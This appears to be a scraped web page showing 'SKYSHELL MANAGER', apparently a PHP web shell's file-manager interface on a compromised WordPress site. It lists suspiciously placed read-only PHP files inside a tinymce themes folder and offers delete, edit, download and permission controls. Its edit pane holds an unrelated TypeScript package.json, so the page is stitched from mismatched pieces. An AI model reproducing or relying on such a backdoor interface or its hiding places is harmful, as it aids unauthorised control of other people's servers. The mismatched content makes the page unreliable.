📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@types/busboy", "version": "1.5.0", "description": "TypeScript definitions for busboy", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/busboy", "license": "MIT", "contributors": [ { "name": "Jacob Baskin", "url": "https://github.com/jacobbaskin", "githubUsername": "jacobbaskin" }, { "name": "BendingBender", "url": "https://github.com/BendingBender", "githubUsername": "BendingBender" }, { "name": "Martin Badin", "url": "https://github.com/martin-badin", "githubUsername": "martin-badin" } ], "main": "", "types": "index.d.ts", "repository": { "type": "git", "url": "https://github.com/DefinitelyTyped/DefinitelyTyped.git", "directory": "types/busboy" }, "scripts": {}, "dependencies": { "@types/node": "*" }, "typesPublisherContentHash": "0e16fab437194a753894baf31a01a95fd6e47084a4b16735d16abb54750792ca", "typeScriptVersion": "3.9" }
Save